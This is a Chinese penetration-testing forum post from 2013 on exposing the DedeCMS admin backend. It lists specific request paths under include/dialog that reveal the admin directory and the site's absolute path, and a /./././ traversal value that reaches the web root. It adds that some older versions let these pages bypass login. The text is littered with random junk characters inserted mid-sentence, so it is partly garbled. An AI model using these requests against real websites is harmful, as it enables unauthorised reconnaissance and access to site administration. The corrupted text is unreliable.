中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
) U: J3 l! g4 A; Q+ o6 e( I/ J
* a# A3 X4 W9 {: ^  }' y& N8 e) t员帐号,新版本的就直接转向了后台.% }+ y' @6 s; d0 e5 \
& M8 v" ]: V* G2 `0 w3 e
2.include/dialog/config.php会爆出后台管理路径9 Y5 f1 X+ B) L
8 C6 ]1 x, b& }# j) ~+ Y. S
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
2 `7 v" W; S# N, P7 y8 b
: Z: w, ~+ n  O! y. E) k+ K4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.4 r8 e' v. [6 J# n( E

4 a/ ]) o, m; l1 \8 \5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉9 ?3 P# ]3 I% K# ?# Q# @# B: `$ j4 i

7 X# C: ?5 f& p% n7 |: j: `/ t$ U到根目录去.不过这些版本的访问地址有些不同.
2 Q8 ^$ X& e/ v1 [  ^地址为require/dialog/select_soft.php?activepath=/././././././././- L5 P' N1 j  c

( |  W0 b1 e3 \; L, @include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..; r! s  B' r: A4 `, d  m) Z
存在相同问题的文件还有
7 q: s4 s' Q1 ?  Z. cinclude\dialog\select_images.php
& Y% A7 @5 m* D- `: Winclude\dialog\select_media.php1 C; {: C+ x8 |- X
include\dialog\select_templets.php​5 E7 u4 F; |0 J2 g




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2